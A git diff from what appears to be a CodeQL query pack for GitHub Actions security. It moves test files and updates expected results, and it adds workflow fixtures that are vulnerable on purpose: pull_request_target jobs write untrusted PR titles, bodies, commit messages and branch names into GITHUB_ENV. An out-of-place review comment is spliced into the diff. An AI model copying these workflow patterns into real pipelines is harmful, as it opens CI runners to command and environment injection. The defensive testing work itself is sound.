diff --git a/ql/test/library-tests/poisonable_steps.expected b/ql/test/library-tests/poisonable_steps.expected index a87ec0a341c3..100eddb14002 100644 --- a/ql/test/library-tests/poisonable_steps.expected +++ b/ql/test/library-tests/poisonable_steps.expected @@ -1,3 +1,5 @@ +| .github/workflows/multiline2.yml:63:9:66:6 | Run Step | +| .github/workflows/multiline.yml:63:9:66:6 | Run Step | | .github/workflows/poisonable_steps.yml:8:9:13:6 | Uses Step | | .github/workflows/poisonable_steps.yml:13:9:14:6 | Run Step | | .github/workflows/poisonable_steps.yml:14:9:15:6 | Run Step | diff --git a/ql/test/library-tests/test.ql b/ql/test/library-tests/test.ql index 5880e06da7fd..03f9e5b18405 100644 --- a/ql/test/library-tests/test.ql +++ b/ql/test/library-tests/test.ql @@ -150,6 +150,6 @@ query predicate isBashParameterExpansion(string parameter, string operator, stri "${parameter21%%pattern}", "${parameter22/pattern/string}", "${parameter23//pattern/string}", ] and - Bash::isBashParameterExpansion(test, parameter, operator, params) + Bash::isParameterExpansion(test, parameter, operator, params) ) } diff --git a/ql/test/query-tests/Security/CWE-020/.github/workflows/calling_composite.yml b/ql/test/query-tests/Models/.github/workflows/calling_composite.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-020/.github/workflows/calling_composite.yml rename to ql/test/query-tests/Models/.github/workflows/calling_composite.yml diff --git a/ql/test/query-tests/Security/CWE-020/.github/workflows/calling_workflow.yml b/ql/test/query-tests/Models/.github/workflows/calling_workflow.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-020/.github/workflows/calling_workflow.yml rename to ql/test/query-tests/Models/.github/workflows/calling_workflow.yml 
diff --git a/ql/test/query-tests/Security/CWE-020/.github/workflows/reusable_workflow.yml b/ql/test/query-tests/Models/.github/workflows/reusable_workflow.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-020/.github/workflows/reusable_workflow.yml rename to ql/test/query-tests/Models/.github/workflows/reusable_workflow.yml diff --git a/ql/test/query-tests/Security/CWE-020/CompositeActionsSinks.expected b/ql/test/query-tests/Models/CompositeActionsSinks.expected similarity index 100% rename from ql/test/query-tests/Security/CWE-020/CompositeActionsSinks.expected rename to ql/test/query-tests/Models/CompositeActionsSinks.expected diff --git a/ql/test/query-tests/Security/CWE-020/CompositeActionsSinks.qlref b/ql/test/query-tests/Models/CompositeActionsSinks.qlref similarity index 100% rename from ql/test/query-tests/Security/CWE-020/CompositeActionsSinks.qlref rename to ql/test/query-tests/Models/CompositeActionsSinks.qlref diff --git a/ql/test/query-tests/Security/CWE-020/CompositeActionsSources.expected b/ql/test/query-tests/Models/CompositeActionsSources.expected similarity index 100% rename from ql/test/query-tests/Security/CWE-020/CompositeActionsSources.expected rename to ql/test/query-tests/Models/CompositeActionsSources.expected diff --git a/ql/test/query-tests/Security/CWE-020/CompositeActionsSources.qlref b/ql/test/query-tests/Models/CompositeActionsSources.qlref similarity index 100% rename from ql/test/query-tests/Security/CWE-020/CompositeActionsSources.qlref rename to ql/test/query-tests/Models/CompositeActionsSources.qlref diff --git a/ql/test/query-tests/Security/CWE-020/CompositeActionsSummaries.expected b/ql/test/query-tests/Models/CompositeActionsSummaries.expected similarity index 100% rename from ql/test/query-tests/Security/CWE-020/CompositeActionsSummaries.expected rename to ql/test/query-tests/Models/CompositeActionsSummaries.expected 
diff --git a/ql/test/query-tests/Security/CWE-020/CompositeActionsSummaries.qlref b/ql/test/query-tests/Models/CompositeActionsSummaries.qlref similarity index 100% rename from ql/test/query-tests/Security/CWE-020/CompositeActionsSummaries.qlref rename to ql/test/query-tests/Models/CompositeActionsSummaries.qlref diff --git a/ql/test/query-tests/Security/CWE-020/ReusableWorkflowsSinks.expected b/ql/test/query-tests/Models/ReusableWorkflowsSinks.expected similarity index 100% rename from ql/test/query-tests/Security/CWE-020/ReusableWorkflowsSinks.expected rename to ql/test/query-tests/Models/ReusableWorkflowsSinks.expected diff --git a/ql/test/query-tests/Security/CWE-020/ReusableWorkflowsSinks.qlref b/ql/test/query-tests/Models/ReusableWorkflowsSinks.qlref similarity index 100% rename from ql/test/query-tests/Security/CWE-020/ReusableWorkflowsSinks.qlref rename to ql/test/query-tests/Models/ReusableWorkflowsSinks.qlref diff --git a/ql/test/query-tests/Security/CWE-020/ReusableWorkflowsSources.expected b/ql/test/query-tests/Models/ReusableWorkflowsSources.expected similarity index 100% rename from ql/test/query-tests/Security/CWE-020/ReusableWorkflowsSources.expected rename to ql/test/query-tests/Models/ReusableWorkflowsSources.expected diff --git a/ql/test/query-tests/Security/CWE-020/ReusableWorkflowsSources.qlref b/ql/test/query-tests/Models/ReusableWorkflowsSources.qlref similarity index 100% rename from ql/test/query-tests/Security/CWE-020/ReusableWorkflowsSources.qlref rename to ql/test/query-tests/Models/ReusableWorkflowsSources.qlref diff --git a/ql/test/query-tests/Security/CWE-020/ReusableWorkflowsSummaries.expected b/ql/test/query-tests/Models/ReusableWorkflowsSummaries.expected similarity index 100% rename from ql/test/query-tests/Security/CWE-020/ReusableWorkflowsSummaries.expected rename to ql/test/query-tests/Models/ReusableWorkflowsSummaries.expected 
diff --git a/ql/test/query-tests/Security/CWE-020/ReusableWorkflowsSummaries.qlref b/ql/test/query-tests/Models/ReusableWorkflowsSummaries.qlref similarity index 100% rename from ql/test/query-tests/Security/CWE-020/ReusableWorkflowsSummaries.qlref rename to ql/test/query-tests/Models/ReusableWorkflowsSummaries.qlref diff --git a/ql/test/query-tests/Security/CWE-020/action1/action.yml b/ql/test/query-tests/Models/action1/action.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-020/action1/action.yml rename to ql/test/query-tests/Models/action1/action.yml diff --git a/ql/test/query-tests/Security/CWE-074/OutputClobberingHigh.expected b/ql/test/query-tests/Security/CWE-074/OutputClobberingHigh.expected index b6cb2a32e479..715e2c4c90cc 100644 --- a/ql/test/query-tests/Security/CWE-074/OutputClobberingHigh.expected +++ b/ql/test/query-tests/Security/CWE-074/OutputClobberingHigh.expected 
@@ -1,12 +1,12 @@ edges -| .github/workflows/output1.yml:9:18:9:49 | github.event.comment.body | .github/workflows/output1.yml:10:14:13:50 | # VULNERABLE\necho "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT\necho "OUTPUT_2=$BODY" >> $GITHUB_OUTPUT\n | provenance | | -| .github/workflows/output1.yml:30:9:35:6 | Uses Step | .github/workflows/output1.yml:36:14:38:58 | echo "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT\necho "OUTPUT_2=$(> $GITHUB_OUTPUT\n | provenance | | -| .github/workflows/output2.yml:9:18:9:49 | github.event.comment.body | .github/workflows/output2.yml:10:14:13:48 | # VULNERABLE\necho $BODY\necho "::set-output name=OUTPUT::SAFE"\n | provenance | | -| .github/workflows/output2.yml:16:18:16:49 | github.event.comment.body | .github/workflows/output2.yml:17:14:20:21 | # VULNERABLE\necho "::set-output name=OUTPUT::SAFE"\necho $BODY\n | provenance | | -| .github/workflows/output2.yml:36:9:41:6 | Uses Step | .github/workflows/output2.yml:42:14:46:48 | # VULNERABLE\nPR="$(> $GITHUB_OUTPUT\necho "OUTPUT_2=$BODY" >> $GITHUB_OUTPUT\n | provenance | Config | +| .github/workflows/output1.yml:30:9:35:6 | Uses Step | .github/workflows/output1.yml:36:14:38:58 | echo "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT\necho "OUTPUT_2=$(> $GITHUB_OUTPUT\n | provenance | Config | +| .github/workflows/output2.yml:9:18:9:49 | github.event.comment.body | .github/workflows/output2.yml:10:14:13:48 | # VULNERABLE\necho $BODY\necho "::set-output name=OUTPUT::SAFE"\n | provenance | Config | +| .github/workflows/output2.yml:16:18:16:49 | github.event.comment.body | .github/workflows/output2.yml:17:14:20:21 | # VULNERABLE\necho "::set-output name=OUTPUT::SAFE"\necho $BODY\n | provenance | Config | +| .github/workflows/output2.yml:36:9:41:6 | Uses Step | .github/workflows/output2.yml:42:14:46:48 | # VULNERABLE\nPR="$(> $GITHUB_OUTPUT\necho "OUTPUT_2=$BODY" >> $GITHUB_OUTPUT\n | semmle.label | # VULNERABLE\necho "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT\necho "OUTPUT_2=$BODY" >> $GITHUB_OUTPUT\n | 
diff --git a/ql/test/query-tests/Security/CWE-077/.github/workflows/test13.yml b/ql/test/query-tests/Security/CWE-077/.github/workflows/test13.yml
new file mode 100644
index 000000000000..78d288fb9822
--- /dev/null
+++ b/ql/test/query-tests/Security/CWE-077/.github/workflows/test13.yml
@@ -0,0 +1,23 @@
+name: publish
+on:
+  pull_request_target:
+    branches:
+      - main
+jobs:
+  need-publish:
+    permissions:
+      actions: write
+    name: Need Publish
+    runs-on: ubuntu-latest
+    steps:
+      - name: Checkout
+        uses: actions/checkout@v4
+        with:
+          ref: ${{ github.event.pull_request.head.ref }}
+      - name: Get commit message
+        run: |
+          COMMIT_MESSAGE=$(git log --format=%s)
+          echo "COMMIT_MESSAGE=${COMMIT_MESSAGE}" >> $GITHUB_ENV
+      - name: Get commit message
+        run: |
+          echo "COMMIT_MESSAGE=$(git log --format=%s)" >> $GITHUB_ENV
diff --git a/ql/test/query-tests/Security/CWE-077/.github/workflows/test14.yml b/ql/test/query-tests/Security/CWE-077/.github/workflows/test14.yml
new file mode 100644
index 000000000000..93854c5e889f
--- /dev/null
+++ b/ql/test/query-tests/Security/CWE-077/.github/workflows/test14.yml
@@ -0,0 +1,30 @@
+name: Pull Request Open
+
+on:
+  pull_request_target:
+
+jobs:
+  test1:
+    runs-on: ubuntu-latest
+    steps:
+      - uses: actions/checkout@v2
+        with:
+          ref: ${{ github.event.pull_request.head.sha }}
+      - id: changed-files
+        run: |
+          echo "CHANGED-FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)" >> "$GITHUB_ENV"
+      - run: echo "${{ env.CHANGED-FILES }}"
+  test2:
+    runs-on: ubuntu-latest
+    steps:
+      - uses: actions/checkout@v2
+        with:
+          ref: ${{ github.event.pull_request.head.sha }}
+      - id: changed-files
+        run: |
+          FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)
+          echo "CHANGED-FILES=${FILES}" >> "$GITHUB_ENV"
+      - run: echo "${{ env.CHANGED-FILES }}"
+
+
+
diff --git a/ql/test/query-tests/Security/CWE-077/.github/workflows/test15.yml b/ql/test/query-tests/Security/CWE-077/.github/workflows/test15.yml
new file mode 100644
index 000000000000..89ecd8c0ec3e
--- /dev/null
+++ b/ql/test/query-tests/Security/CWE-077/.github/workflows/test15.yml
@@ -0,0 +1,29 @@
+name: Pull Request Open
+
+on:
+  pull_request_target:
+
+jobs:
+  test1:
+    runs-on: ubuntu-latest
+    steps:
+      - id: title
+        run: |
+          echo "BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})" >> "$GITHUB_ENV"
+      - run: echo "$TITLE"
+  test2:
+    runs-on: ubuntu-latest
+    steps:
+      - id: title
+        run: |
+          PR_BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})
+          echo "BODY=$PR_BODY" >> "$GITHUB_ENV"
+      - run: echo "$TITLE"
+  test3:
+    runs-on: ubuntu-latest
+    steps:
+      - run: |
+          echo "branch_name=$(jq --raw-output .pull_request.head.ref $GITHUB_EVENT_PATH)" >> $GITHUB_ENV
+
+
+
diff --git a/ql/test/query-tests/Security/CWE-077/.github/workflows/test8.yml b/ql/test/query-tests/Security/CWE-077/.github/workflows/test8.yml
index 05bde57551db..806f8dc8e45c 100644
--- a/ql/test/query-tests/Security/CWE-077/.github/workflows/test8.yml
+++ b/ql/test/query-tests/Security/CWE-077/.github/workflows/test8.yml
@@ -20,8 +20,6 @@ jobs:
       contents: write
     steps:
       - uses: actions/checkout@v4
-        with:
-          ref: foo
       - name: Download and Extract Artifacts
         uses: dawidd6/action-download-artifact@v6
 
diff --git a/ql/test/query-tests/Security/CWE-077/EnvPathInjectionCritical.expected b/ql/test/query-tests/Security/CWE-077/EnvPathInjectionCritical.expected
index 7fab238795c6..851aa5241546 100644
--- a/ql/test/query-tests/Security/CWE-077/EnvPathInjectionCritical.expected
+++ b/ql/test/query-tests/Security/CWE-077/EnvPathInjectionCritical.expected
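Review bot: In test15.yml the consumer steps run `echo "$TITLE"` although both `title` steps write a variable named `BODY` to `$GITHUB_ENV`, so the follow-up step never reads what was injected; if the fixture is meant to show the sink being consumed, `- run: echo "$BODY"` is the line intended. The step ids are also `title` while the content is the PR body, which makes the expected-output entries harder to read. Neither affects the query result, since the sink is the writing step, but fixtures are read as documentation of what the query catches.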
@@ -1,10 +1,9 @@ edges -| .github/workflows/path1.yml:13:21:13:58 | github.event.pull_request.title | .github/workflows/path1.yml:14:14:14:52 | echo $(echo "$PATHINJ") >> $GITHUB_PATH | provenance | | -| .github/workflows/path1.yml:16:21:16:58 | github.event.pull_request.title | .github/workflows/path1.yml:17:14:17:42 | echo $PATHINJ >> $GITHUB_PATH | provenance | | -| .github/workflows/path1.yml:19:21:19:58 | github.event.pull_request.title | .github/workflows/path1.yml:20:14:20:44 | echo ${PATHINJ} >> $GITHUB_PATH | provenance | | -| .github/workflows/path1.yml:21:9:25:6 | Uses Step | .github/workflows/path1.yml:25:14:25:50 | echo "$(cat foo/bar)" >> $GITHUB_PATH | provenance | | -| .github/workflows/path1.yml:21:9:25:6 | Uses Step | .github/workflows/path1.yml:29:14:29:40 | echo "::add-path::$PATHINJ" | provenance | | -| .github/workflows/path1.yml:28:21:28:58 | github.event.pull_request.title | .github/workflows/path1.yml:29:14:29:40 | echo "::add-path::$PATHINJ" | provenance | | +| .github/workflows/path1.yml:13:21:13:58 | github.event.pull_request.title | .github/workflows/path1.yml:14:14:14:52 | echo $(echo "$PATHINJ") >> $GITHUB_PATH | provenance | Config | +| .github/workflows/path1.yml:16:21:16:58 | github.event.pull_request.title | .github/workflows/path1.yml:17:14:17:42 | echo $PATHINJ >> $GITHUB_PATH | provenance | Config | +| .github/workflows/path1.yml:19:21:19:58 | github.event.pull_request.title | .github/workflows/path1.yml:20:14:20:44 | echo ${PATHINJ} >> $GITHUB_PATH | provenance | Config | +| .github/workflows/path1.yml:21:9:25:6 | Uses Step | .github/workflows/path1.yml:25:14:25:50 | echo "$(cat foo/bar)" >> $GITHUB_PATH | provenance | Config | +| .github/workflows/path1.yml:28:21:28:58 | github.event.pull_request.title | .github/workflows/path1.yml:29:14:29:40 | echo "::add-path::$PATHINJ" | provenance | Config | nodes | .github/workflows/path1.yml:13:21:13:58 | github.event.pull_request.title | semmle.label | github.event.pull_request.title 
| | .github/workflows/path1.yml:14:14:14:52 | echo $(echo "$PATHINJ") >> $GITHUB_PATH | semmle.label | echo $(echo "$PATHINJ") >> $GITHUB_PATH | diff --git a/ql/test/query-tests/Security/CWE-077/EnvPathInjectionMedium.expected b/ql/test/query-tests/Security/CWE-077/EnvPathInjectionMedium.expected index ea360bc56df0..5be9f729ad64 100644 --- a/ql/test/query-tests/Security/CWE-077/EnvPathInjectionMedium.expected +++ b/ql/test/query-tests/Security/CWE-077/EnvPathInjectionMedium.expected 
@@ -1,10 +1,9 @@ edges -| .github/workflows/path1.yml:13:21:13:58 | github.event.pull_request.title | .github/workflows/path1.yml:14:14:14:52 | echo $(echo "$PATHINJ") >> $GITHUB_PATH | provenance | | -| .github/workflows/path1.yml:16:21:16:58 | github.event.pull_request.title | .github/workflows/path1.yml:17:14:17:42 | echo $PATHINJ >> $GITHUB_PATH | provenance | | -| .github/workflows/path1.yml:19:21:19:58 | github.event.pull_request.title | .github/workflows/path1.yml:20:14:20:44 | echo ${PATHINJ} >> $GITHUB_PATH | provenance | | -| .github/workflows/path1.yml:21:9:25:6 | Uses Step | .github/workflows/path1.yml:25:14:25:50 | echo "$(cat foo/bar)" >> $GITHUB_PATH | provenance | | -| .github/workflows/path1.yml:21:9:25:6 | Uses Step | .github/workflows/path1.yml:29:14:29:40 | echo "::add-path::$PATHINJ" | provenance | | -| .github/workflows/path1.yml:28:21:28:58 | github.event.pull_request.title | .github/workflows/path1.yml:29:14:29:40 | echo "::add-path::$PATHINJ" | provenance | | +| .github/workflows/path1.yml:13:21:13:58 | github.event.pull_request.title | .github/workflows/path1.yml:14:14:14:52 | echo $(echo "$PATHINJ") >> $GITHUB_PATH | provenance | Config | +| .github/workflows/path1.yml:16:21:16:58 | github.event.pull_request.title | .github/workflows/path1.yml:17:14:17:42 | echo $PATHINJ >> $GITHUB_PATH | provenance | Config | +| .github/workflows/path1.yml:19:21:19:58 | github.event.pull_request.title | .github/workflows/path1.yml:20:14:20:44 | echo ${PATHINJ} >> $GITHUB_PATH | provenance | Config | +| .github/workflows/path1.yml:21:9:25:6 | Uses Step | .github/workflows/path1.yml:25:14:25:50 | echo "$(cat foo/bar)" >> $GITHUB_PATH | provenance | Config | +| .github/workflows/path1.yml:28:21:28:58 | github.event.pull_request.title | .github/workflows/path1.yml:29:14:29:40 | echo "::add-path::$PATHINJ" | provenance | Config | nodes | .github/workflows/path1.yml:13:21:13:58 | github.event.pull_request.title | semmle.label | github.event.pull_request.title 
| | .github/workflows/path1.yml:14:14:14:52 | echo $(echo "$PATHINJ") >> $GITHUB_PATH | semmle.label | echo $(echo "$PATHINJ") >> $GITHUB_PATH | diff --git a/ql/test/query-tests/Security/CWE-077/EnvVarInjectionCritical.expected b/ql/test/query-tests/Security/CWE-077/EnvVarInjectionCritical.expected index 6ad5cf043044..aff785242f9b 100644 --- a/ql/test/query-tests/Security/CWE-077/EnvVarInjectionCritical.expected +++ b/ql/test/query-tests/Security/CWE-077/EnvVarInjectionCritical.expected 
@@ -1,30 +1,29 @@ edges -| .github/workflows/test2.yml:12:9:41:6 | Uses Step | .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | provenance | | -| .github/workflows/test3.yml:13:7:20:4 | Uses Step | .github/workflows/test3.yml:20:12:23:77 | echo "PR_NUMBER=$(cat pr_number.txt \| jq -r .)" >> $GITHUB_ENV\necho "PR_HEAD_REPO=$(cat pr_head_repo.txt \| jq -Rr .)" >> $GITHUB_ENV\necho "PR_HEAD_REF=$(cat pr_head_ref.txt \| jq -Rr .)" >> $GITHUB_ENV\n | provenance | | -| .github/workflows/test4.yml:11:19:11:56 | github.event.pull_request.title | .github/workflows/test4.yml:12:14:13:48 | echo "PR_TITLE=$TITLE" >> $GITHUB_ENV\n | provenance | | -| .github/workflows/test4.yml:15:19:15:56 | github.event.pull_request.title | .github/workflows/test4.yml:16:14:17:50 | echo "PR_TITLE=${TITLE}" >> $GITHUB_ENV\n | provenance | | -| .github/workflows/test4.yml:19:19:19:56 | github.event.pull_request.title | .github/workflows/test4.yml:20:14:21:54 | echo PR_TITLE=$(echo $TITLE) >> $GITHUB_ENV\n | provenance | | -| .github/workflows/test4.yml:23:19:23:56 | github.event.pull_request.title | .github/workflows/test4.yml:24:14:27:36 | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | provenance | | -| .github/workflows/test4.yml:29:19:29:56 | github.event.pull_request.title | .github/workflows/test4.yml:30:14:33:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\necho "$TITLE" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | provenance | | -| .github/workflows/test4.yml:35:19:35:56 | github.event.pull_request.title | .github/workflows/test4.yml:36:14:41:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | provenance | | -| .github/workflows/test4.yml:43:19:43:56 | github.event.pull_request.title | .github/workflows/test4.yml:44:14:47:14 | cat <<-EOF >> "$GITHUB_ENV"\nFOO=$TITLE\nEOF\n | provenance | | -| .github/workflows/test4.yml:57:27:57:64 | github.event.pull_request.title | 
.github/workflows/test4.yml:55:14:55:70 | echo "BRANCH=$(echo ${TARGET_BRANCH##*/})" >> $GITHUB_ENV | provenance | | -| .github/workflows/test4.yml:60:19:60:56 | github.event.pull_request.title | .github/workflows/test4.yml:58:14:58:94 | echo ISSUE_KEY=$(echo "${TITLE}" \| grep -oP 'ISPN-(?P[0-9]+)') >> $GITHUB_ENV | provenance | | -| .github/workflows/test5.yml:10:9:30:6 | Uses Step | .github/workflows/test5.yml:33:14:36:62 | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | provenance | | -| .github/workflows/test6.yml:11:19:11:56 | github.event.pull_request.title | .github/workflows/test6.yml:12:14:14:46 | FOO=${TITLE##*/}\necho PR_TITLE=${FOO} >> $GITHUB_ENV\n | provenance | | -| .github/workflows/test6.yml:16:19:16:56 | github.event.pull_request.title | .github/workflows/test6.yml:17:14:19:44 | FOO=$TITLE+\necho PR_TITLE=$FOO >> $GITHUB_ENV\n | provenance | | -| .github/workflows/test6.yml:21:19:21:56 | github.event.pull_request.title | .github/workflows/test6.yml:22:14:24:52 | venv="$(echo $TITLE)')"\necho "VIRTUAL_ENV=${venv}" >> $GITHUB_ENV\n | provenance | | -| .github/workflows/test7.yml:9:9:16:6 | Uses Step | .github/workflows/test7.yml:16:9:24:35 | Uses Step | provenance | | -| .github/workflows/test8.yml:26:9:32:6 | Uses Step | .github/workflows/test8.yml:33:14:35:41 | foo=$(cat ./artifacts/parent-artifacts/event.txt)\necho "foo=$foo" >> $GITHUB_ENV\n | provenance | | -| .github/workflows/test8.yml:26:9:32:6 | Uses Step | .github/workflows/test8.yml:37:14:38:82 | echo "foo=$(cat ./artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | provenance | | -| .github/workflows/test8.yml:26:9:32:6 | Uses Step | .github/workflows/test8.yml:40:14:41:79 | echo "foo=$(< /artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | provenance | | -| .github/workflows/test9.yml:19:9:27:6 | Uses Step | .github/workflows/test9.yml:29:14:41:41 | 
pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_ENV\necho "ref=$ref" >> $GITHUB_ENV\n | provenance | | -| .github/workflows/test10.yml:20:9:26:6 | Uses Step | .github/workflows/test10.yml:27:14:27:59 | cat foo/.github/java-config.env >> $GITHUB_ENV | provenance | | -| .github/workflows/test11.yml:15:9:21:6 | Uses Step | .github/workflows/test11.yml:23:14:28:29 | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | provenance | | -| .github/workflows/test12.yml:38:9:46:6 | Uses Step | .github/workflows/test12.yml:48:14:53:29 | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | provenance | | -| .github/workflows/test12.yml:38:9:46:6 | Uses Step | .github/workflows/test12.yml:55:9:61:6 | Uses Step | provenance | | -| .github/workflows/test12.yml:38:9:46:6 | Uses Step | .github/workflows/test12.yml:63:14:68:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | provenance | | -| .github/workflows/test12.yml:55:9:61:6 | Uses Step | .github/workflows/test12.yml:63:14:68:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | provenance | | +| .github/workflows/test2.yml:12:9:41:6 | Uses Step | .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | provenance | Config | +| .github/workflows/test3.yml:13:7:20:4 | Uses Step | .github/workflows/test3.yml:20:12:23:77 | echo "PR_NUMBER=$(cat pr_number.txt \| jq -r .)" >> $GITHUB_ENV\necho "PR_HEAD_REPO=$(cat pr_head_repo.txt \| jq -Rr .)" >> $GITHUB_ENV\necho "PR_HEAD_REF=$(cat pr_head_ref.txt \| jq -Rr .)" >> $GITHUB_ENV\n | provenance | Config | +| .github/workflows/test4.yml:11:19:11:56 | github.event.pull_request.title | .github/workflows/test4.yml:12:14:13:48 | echo "PR_TITLE=$TITLE" >> $GITHUB_ENV\n | provenance | Config | +| .github/workflows/test4.yml:15:19:15:56 | 
github.event.pull_request.title | .github/workflows/test4.yml:16:14:17:50 | echo "PR_TITLE=${TITLE}" >> $GITHUB_ENV\n | provenance | Config | +| .github/workflows/test4.yml:19:19:19:56 | github.event.pull_request.title | .github/workflows/test4.yml:20:14:21:54 | echo PR_TITLE=$(echo $TITLE) >> $GITHUB_ENV\n | provenance | Config | +| .github/workflows/test4.yml:23:19:23:56 | github.event.pull_request.title | .github/workflows/test4.yml:24:14:27:36 | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | provenance | Config | +| .github/workflows/test4.yml:29:19:29:56 | github.event.pull_request.title | .github/workflows/test4.yml:30:14:33:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\necho "$TITLE" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | provenance | Config | +| .github/workflows/test4.yml:35:19:35:56 | github.event.pull_request.title | .github/workflows/test4.yml:36:14:41:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | provenance | Config | +| .github/workflows/test4.yml:43:19:43:56 | github.event.pull_request.title | .github/workflows/test4.yml:44:14:47:14 | cat <<-EOF >> "$GITHUB_ENV"\nFOO=$TITLE\nEOF\n | provenance | Config | +| .github/workflows/test4.yml:57:27:57:64 | github.event.pull_request.title | .github/workflows/test4.yml:55:14:55:70 | echo "BRANCH=$(echo ${TARGET_BRANCH##*/})" >> $GITHUB_ENV | provenance | Config | +| .github/workflows/test4.yml:60:19:60:56 | github.event.pull_request.title | .github/workflows/test4.yml:58:14:58:94 | echo ISSUE_KEY=$(echo "${TITLE}" \| grep -oP 'ISPN-(?P[0-9]+)') >> $GITHUB_ENV | provenance | Config | +| .github/workflows/test5.yml:10:9:30:6 | Uses Step | .github/workflows/test5.yml:33:14:36:62 | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | provenance | Config | +| .github/workflows/test6.yml:11:19:11:56 | github.event.pull_request.title | 
.github/workflows/test6.yml:12:14:14:46 | FOO=${TITLE##*/}\necho PR_TITLE=${FOO} >> $GITHUB_ENV\n | provenance | Config | +| .github/workflows/test6.yml:16:19:16:56 | github.event.pull_request.title | .github/workflows/test6.yml:17:14:19:44 | FOO=$TITLE+\necho PR_TITLE=$FOO >> $GITHUB_ENV\n | provenance | Config | +| .github/workflows/test6.yml:21:19:21:56 | github.event.pull_request.title | .github/workflows/test6.yml:22:14:24:52 | venv="$(echo $TITLE)')"\necho "VIRTUAL_ENV=${venv}" >> $GITHUB_ENV\n | provenance | Config | +| .github/workflows/test7.yml:9:9:16:6 | Uses Step | .github/workflows/test7.yml:16:9:24:35 | Uses Step | provenance | Config | +| .github/workflows/test8.yml:24:9:30:6 | Uses Step | .github/workflows/test8.yml:31:14:33:41 | foo=$(cat ./artifacts/parent-artifacts/event.txt)\necho "foo=$foo" >> $GITHUB_ENV\n | provenance | Config | +| .github/workflows/test8.yml:24:9:30:6 | Uses Step | .github/workflows/test8.yml:35:14:36:82 | echo "foo=$(cat ./artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | provenance | Config | +| .github/workflows/test8.yml:24:9:30:6 | Uses Step | .github/workflows/test8.yml:38:14:39:79 | echo "foo=$(< /artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | provenance | Config | +| .github/workflows/test9.yml:19:9:27:6 | Uses Step | .github/workflows/test9.yml:29:14:41:41 | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_ENV\necho "ref=$ref" >> $GITHUB_ENV\n | provenance | Config | +| .github/workflows/test10.yml:20:9:26:6 | Uses Step | .github/workflows/test10.yml:27:14:27:59 | cat foo/.github/java-config.env >> $GITHUB_ENV | provenance | Config | +| .github/workflows/test11.yml:15:9:21:6 | Uses Step | .github/workflows/test11.yml:23:14:28:29 | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | 
provenance | Config | +| .github/workflows/test12.yml:38:9:46:6 | Uses Step | .github/workflows/test12.yml:48:14:53:29 | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | provenance | Config | +| .github/workflows/test12.yml:38:9:46:6 | Uses Step | .github/workflows/test12.yml:63:14:68:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | provenance | Config | +| .github/workflows/test12.yml:55:9:61:6 | Uses Step | .github/workflows/test12.yml:63:14:68:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | provenance | Config | nodes | .github/workflows/test2.yml:12:9:41:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | semmle.label | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | 
